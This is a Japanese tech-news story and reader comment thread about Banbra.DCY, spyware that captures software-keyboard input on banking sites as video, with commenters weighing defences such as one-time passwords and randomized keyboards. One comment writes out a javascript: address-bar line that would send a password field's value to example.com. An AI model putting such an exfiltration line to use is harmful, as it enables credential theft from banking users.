ソフトウェアキーボードを使用した入力を監視する新たなスパイウエア 48
ストーリー by yoosee
まさにあの手この手… 部門より
まさにあの手この手… 部門より
O1iver曰く、"ITProの記事によると、スペインPanda Softwareは現地時間9月8日、ソフトウエア・キーボードへの入力を動画として記録し送信するスパイウエアが確認されたとして注意を呼びかけた。
同社が「Banbra.DCY」と名づけたスパイウエアは、ソフトウエア・キーボードを導入している特定のオンライン・バンキング・サイトのユーザーをターゲットとし、このスパイウエアに感染したパソコンでそのサイトへアクセスすると、スパイウエアが動き出してマウス・ポインタが置かれている周辺の画面を次々とキャプチャする。そしてそれらをaviファイルとして保存し、外部へ送信する。同社では今回確認されたスパイウエアのテクニックが、ほかの悪質なプログラムにも応用される可能性があるとして警告している。"
ユーザの演算能力を利用した・・・ (スコア:3, すばらしい洞察)
PCの画面には複合前のメッセージと、それを解読する計算式が表示され、 各ユーザは手帳などに安全に記録した秘密鍵を使って、筆算もしくは関数電卓(PCの電卓ソフトは不可)などで解読、コマンドを同じく暗号化してからキーボードから入力して送信。
全てのスパイウェアを原理的に排除するにはここまでやるしか無いはずです。逆に言えば、ここまでやっておけば、ネットカフェやら信用できない友人宅やらからのアクセスでも安全です。
#なので、中途半端なセキュリティキーボードやらの押しつけは止めて欲しい。
#パスワードは半分ぐらい手の動きで覚えてるので、マウスでぽちぽちやると間違えます。
ワンタイムパスワードでいいんじゃね? (スコア:1, 興味深い)
Re:ワンタイムパスワードでいいんじゃね? (スコア:1, 興味深い)
トークンがちょっと邪魔ですが、使い始めてみると、便利と安心感が大きいので気にならなくなりました。
何より、複雑なパスワードを記憶しなくて良いのが楽です…。
今後、ワンタイムパスワードを使用する銀行増えると思うのですが、トークンを複数配布されるとちょっと困りますね。
統合されたトークンを用意するか、携帯アプリでまかなえるといいんですが…。
Re:ユーザの演算能力を利用した・・・ (スコア:1)
MSのNGSCBなどの、所謂セキュア・コンピューティングというのは、そこまでやらなくても十分な対抗力を持つためのフレームワークと言えます。
例えば、キーボードドライバとPC本体のセキュリティチップが連携して情報を保護していれば、怪しいソフトウェアがそれを抜き出すことはもとより、ケーブルの電気信号を途中でキャプチャしても入力内容を抜き出すことは出来ないようになります。
ところで、公開鍵暗号は計算の面倒な処理なので手でやるのはとても大変ですが、それ以前に一つ問題があります。
公開鍵で暗号化するのは「パスワードそのもの」か、「そのセッションで使用するランダムなセッション鍵」のどちらかでしょうが、
・パスワードそのものの場合は、計算した結果をPC(悪いプログラムが)覚えていれば再利用できてしまう。
・PCから提供されたセッション鍵(共通鍵)の場合でも、こっそり裏でセッションを継続されていたら。
とか考える必要があります。まあ、セキュリティというのはどこか一ヶ所だけを極端に強くしても、次の「最も弱い輪」のところまでしかレベルが上がらないので、ICカード等を使ってサーバから手元までしっかり保護される仕組みを全体で考えるのが効率よいと思います。
Re:ユーザの演算能力を利用した・・・ (スコア:0)
Re:ユーザの演算能力を利用した・・・ (スコア:1)
イタチごっこ (スコア:2, 参考になる)
リンク先を読めば、分かりますが、これって、
という前置きがポイントなんですね。
それにしても、「ピーアンドエー」のスペイン支社?ソフトウェア部門があるのか?って思ったら、ほんとにパンダだった;)
--- Dead Poet Social Club
Re:イタチごっこ (スコア:2, おもしろおかしい)
>ソフトウエア・キーボードを導入
で、今回のスパイウェア・・・
次は、webカムに向かって特定のアクションを行うことで、
個人認証と入力を行うようにするとか。
尻文字 [nifty.com]なんかを応用すると、いいかも。
Re:イタチごっこ (スコア:1)
みずほ銀行の対策は (スコア:2, 参考になる)
昔なつかしマニュアルプロテクトですね。
別紙に記載してあるマニュアルの何ページ目の何行目の最初の文字は?
といった感じで、郵送で送られてくる「第2暗証番号6桁」を
毎回ランダムに4桁指定の順番で入力させます。
キーロガーには強そうだけど、毎回キャプチャーされたら
何回か目にはさすがに全部漏れそう。
いろんな対策を併用してやっていくしかないでしょうかね。
他の銀行はどんな対策しているのだろうか
Re:みずほ銀行の対策は (スコア:1)
キャプションを伏せるソフトウェアキーボード (スコア:2, 興味深い)
キーの配列をランダムで入れ替えるボタンがあって、ボタンを入れ替えたとき以外は入力用のボタンにキャプションが表示されないものです。
ユーザーは文字を入力するごとに配置入れ替えボタンを押して、目的の文字のキーを記憶してから押します。
# 完璧な対策はないけどね
Re:キャプションを伏せるソフトウェアキーボード (スコア:2, すばらしい洞察)
Re:キャプションを伏せるソフトウェアキーボード (スコア:1)
こういうヤツのことだよね。
残念ながら、僕の環境では対応していないけど。
Re:キャプションを伏せるソフトウェアキーボード (スコア:0)
たんなる気分。
あと、業者が儲かるだけね。
Re:キャプションを伏せるソフトウェアキーボード (スコア:0)
新しいのですか? (スコア:1, 興味深い)
こういう動作をするものがこれまでは無かったということですか?
郵貯のサイトのソフトキーボードにその手の手法に対する対策がされて
いるので、てっきりポピュラーな手口なのだと思っていました。
Re:新しいのですか? (スコア:1)
ソフトウェアキーボードのボタン?に凹んで見える効果が
なければキャプチャされても大丈夫なのかも。
マウスカーソルの座標(ベクトルデータ)とクリックイベントも取得して、自前のマウスカーソルの画像と合成してAVIにしているのならだめだけど。
Re:新しいのですか? (スコア:2, 参考になる)
> マウス・ポインタが置かれている周辺の画面を次々とキャプチャ
とある通り、マウスカーソルの位置はもろバレですよ。
ムービー(avi)にしてしまっているので、
「クリック」しているかどうかの情報は出ませんから、
画面見た目に凹む効果が無ければそれなりに効果的ですかね。
関係ないボタンも一通りカーソルを動かしておく必要がありますが…
そこで今回ご紹介するのがこの商品 (スコア:1)
自力で発見する手助けをするだけですが。
#キーロガー発見系のサービスって信用できるのだろうか?
金融系サイトの表記 (スコア:1, 興味深い)
(もともと信用してませんでしたが)
逆にキャプチャーとして残されるのなら、キーボードで入力したほうが安全なんでしょうね、この場合「*」とかで表示されるので)
Re:金融系サイトの表記 (スコア:0)
つ「キーロガー」
送られるデータは1種類と決めつけてはいけません。
Re:金融系サイトの表記 (スコア:0)
> 送られるデータは1種類と決めつけてはいけません。
いやいやわかってますよ。
そんなこと。
あくまでもこのスパイウェアの挙動に対してかいただけですので。。
発想を変えて (スコア:0)
Re:発想を変えて (スコア:1, すばらしい洞察)
つ Remote Desktop
そもそも、助けを求めてくる人が、IPアドレスを相手に教える(調べる)事ができるかどうかという方が、問題な気がしないでもない。
Re:発想を変えて (スコア:4, おもしろおかしい)
「貴方のパソコンのIPアドレスは?」
「えーと、127.0.0.1」
「ちゃんと動いてるようですけど?」
「え~、だって動いてないよ」
「アドレス127.0.0.1ですよね?」
「そう、127.0.0.1」
「やっぱり動いてますよ」
「え~、だって動いてないよ」
:
以下ループ(w
Re:発想を変えて (スコア:1, すばらしい洞察)
インストールはウィルスの感染と同じようにワンクリックで完了。
助けを求めてくる人が直前にやっていそうなことをさせるだけでOKなんだが。
VNCやRemote Desktopとやらはそこまで簡単に素から使えるようにできるのかな?
Re:発想を変えて (スコア:1)
ポートをこちらが出向いたときに開けておくとかしないといけないしなぁ
Re:発想を変えて (スコア:1)
サーバ(操作される側)からクライアント(操作する側)にコネクションを張りますので、
サーバ側のIPアドレスを事前に知る必要はありませんし、
ファイアウォール越えだとか穴を開けてとか難しい設定は不要です。
助けを求めた人に
・VNCサーバをインストールさせる
・「Add new client」で、こちらから指定したIPアドレス/ホスト名を入力させる
ことができればOK。
#それでも、難易度はかなり高そうだ…
#事前にインストールしておけばいいんでしょうけど…
Re:発想を変えて (スコア:1)
(解説記事 [kyms.ne.jp])
Re:発想を変えて (スコア:1)
#今は実家住まいだけど。
前からあった (スコア:0)
ワンタイムパスワード (スコア:0, 余計なもの)
三井住友銀行がワンタイムパスワード採用 [srad.jp]
Re:ワンタイムパスワード (スコア:0)
Re:一般人向けデモ用? (スコア:1)
と思ったけど、スパイウェアからブラウザのアドレス欄に対して以下キー入力をSendMessageしたらイケルような気もしてきた。
[Ctrl+A][BS]javascript:document.href="http://example.com/?foo.cgi?pass=" + document.pp.value[Enter]
Re:一般人向けデモ用? (スコア:1)
ウィンドウメッセージを監視する Spy++ みたいなプログラムの動作原理を理解していれば Windows 向けのキーロガーは結構簡単に作れちゃうんだけどね。
で、具体的にはどんなことができるの?
むらちより/あい/をこめて。
Re:一般人向けデモ用? (スコア:0)
ブラウザの document.pp.value にアクセスする。
お前馬鹿だろ?
Re:一般人向けデモ用? (スコア:1)
で、どうやってアクセスするの? つか、どうやってアクセスするためのコードを HTML に忍ばせるの? そして忍ばせたコードを利用して取得した値を攻撃者が受け取る方法は?
むらちより/あい/をこめて。
Re:一般人向けデモ用? (スコア:1, 興味深い)
>pass = document.pp.value
無駄です。
ソフトウェアキーボードを使用している場合、大抵、送信されるデータはスクランブルされています。
ボタンの表示が「A」なのに、送信されるデータは「d」とかそんな感じ。
つまり、ボタンの表示内容まで取得しなければなりません。
…ま、特定銀行をターゲットとしたキーロガー作るなら、それぐらい簡単だと思うけどねw
結局、画面をキャプチャして送信した方が確実だってことでしょう。
#トコロで、画面キャプチャ型スパイウエアって、けっこう前から無かったっけ??
Re:一般人向けデモ用? (スコア:0)
その変換表はそのときの HTML に書いてあるよ。
Re:一般人向けデモ用? (スコア:0)
Re:一般人向けデモ用? (スコア:0)
最近、日本語の成績が悪そうな人のコメントが増えたなぁ
読解力が乏し過ぎる
Re:一般人向けデモ用? (スコア:1)
文章の意図は、
・ javascriptを使えば入力欄の値を取得できるのでは?
と仮定
・ その条件の場合、値を取得できないはず。
と反論するつもりで調査しました。
typeがpasswordだとvalueにアクセスできなかったように記憶していたのでローカルファイルで試してみたところ、アクセスできてしまったのであのような記述をしてしまいました。
javascriptでの入力欄アクセスは同一サイトの場合に限られているハズなので実際の銀行ページに対しては動作しないはずなんですがめんどいので誰か調べてクレ。
Re:一般人向けデモ用? (スコア:1, すばらしい洞察)